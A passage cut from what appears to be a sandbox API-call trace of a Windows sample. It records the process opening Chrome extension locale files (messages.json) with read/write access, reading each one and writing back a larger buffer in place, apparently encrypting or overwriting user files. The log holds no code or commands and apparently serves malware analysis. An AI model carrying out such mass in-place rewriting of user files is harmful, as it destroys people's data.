ReleaseMutex (hMutex=0x168) returned 1 [0138.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.135] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c54f8, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c54f8*, lpNumberOfBytesRead=0x345f2bc*=0xdd, lpOverlapped=0x0) returned 1 [0138.137] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.137] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x345f2d0*=0x665, lpOverlapped=0x0) returned 1 [0138.137] CloseHandle (hObject=0x1cc) returned 1 [0138.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.139] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.139] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe0 [0138.139] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.139] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.140] ReleaseMutex (hMutex=0x168) returned 1 [0138.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.140] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c54f8, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c54f8*, lpNumberOfBytesRead=0x345f2bc*=0xe0, lpOverlapped=0x0) returned 1 [0138.141] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.141] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x668, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x345f2d0*=0x668, lpOverlapped=0x0) returned 1 [0138.142] CloseHandle (hObject=0x1cc) returned 1 [0138.142] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.143] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.144] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x10a [0138.144] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.144] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.144] ReleaseMutex (hMutex=0x168) returned 1 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.144] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ef2c78, nNumberOfBytesToRead=0x10a, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c78*, lpNumberOfBytesRead=0x345f2bc*=0x10a, lpOverlapped=0x0) returned 1 [0138.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.146] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x692, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x345f2d0*=0x692, lpOverlapped=0x0) returned 1 [0138.146] CloseHandle (hObject=0x1cc) returned 1 [0138.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe1 [0138.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.148] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.149] ReleaseMutex (hMutex=0x168) returned 1 [0138.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.149] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c54f8, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c54f8*, lpNumberOfBytesRead=0x345f2bc*=0xe1, lpOverlapped=0x0) returned 1 [0138.150] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.151] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x669, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x345f2d0*=0x669, lpOverlapped=0x0) returned 1 [0138.151] CloseHandle (hObject=0x1cc) returned 1 [0138.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.155] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.155] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x13f [0138.156] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.156] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.156] ReleaseMutex (hMutex=0x168) returned 1 [0138.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.156] ReadFile (in: hFile=0x1cc, lpBuffer=0x268af88, nNumberOfBytesToRead=0x13f, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268af88*, lpNumberOfBytesRead=0x345f2bc*=0x13f, lpOverlapped=0x0) returned 1 [0138.158] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.158] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x6c7, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x345f2d0*=0x6c7, lpOverlapped=0x0) returned 1 [0138.158] CloseHandle (hObject=0x1cc) returned 1 [0138.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.160] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.160] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x103 [0138.161] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.161] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.161] ReleaseMutex (hMutex=0x168) returned 1 [0138.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.161] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eeb418, nNumberOfBytesToRead=0x103, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb418*, lpNumberOfBytesRead=0x345f2bc*=0x103, lpOverlapped=0x0) returned 1 [0138.163] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.163] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x68b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x345f2d0*=0x68b, lpOverlapped=0x0) returned 1 [0138.163] CloseHandle (hObject=0x1cc) returned 1 [0138.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x159 [0138.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.165] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.166] ReleaseMutex (hMutex=0x168) returned 1 [0138.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.166] ReadFile (in: hFile=0x1cc, lpBuffer=0x26a7768, nNumberOfBytesToRead=0x159, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a7768*, lpNumberOfBytesRead=0x345f2bc*=0x159, lpOverlapped=0x0) returned 1 [0139.270] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.270] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a9cc8*, nNumberOfBytesToWrite=0x6e1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a9cc8*, lpNumberOfBytesWritten=0x345f2d0*=0x6e1, lpOverlapped=0x0) returned 1 [0139.900] CloseHandle (hObject=0x1cc) returned 1 [0139.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.900] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.901] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x102 [0139.901] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.901] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.901] ReleaseMutex (hMutex=0x168) returned 1 [0139.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.901] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eeb0e8, nNumberOfBytesToRead=0x102, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb0e8*, lpNumberOfBytesRead=0x345f2bc*=0x102, lpOverlapped=0x0) returned 1 [0139.902] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.902] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x68a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x68a, lpOverlapped=0x0) returned 1 [0139.902] CloseHandle (hObject=0x1cc) returned 1 [0139.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.907] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.907] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x152 [0139.907] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.907] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.907] ReleaseMutex (hMutex=0x168) returned 1 [0139.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.907] ReadFile (in: hFile=0x1cc, lpBuffer=0x25e9498, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25e9498*, lpNumberOfBytesRead=0x345f2bc*=0x152, lpOverlapped=0x0) returned 1 [0139.908] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.908] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x6da, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x6da, lpOverlapped=0x0) returned 1 [0139.909] CloseHandle (hObject=0x1cc) returned 1 [0139.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.910] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.910] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x117 [0139.910] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.910] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.910] ReleaseMutex (hMutex=0x168) returned 1 [0139.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.910] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec7598, nNumberOfBytesToRead=0x117, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec7598*, lpNumberOfBytesRead=0x345f2bc*=0x117, lpOverlapped=0x0) returned 1 [0139.912] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.912] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x69f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x69f, lpOverlapped=0x0) returned 1 [0139.912] CloseHandle (hObject=0x1cc) returned 1 [0139.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.914] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.914] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb3 [0139.914] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.914] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.915] ReleaseMutex (hMutex=0x168) returned 1 [0139.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 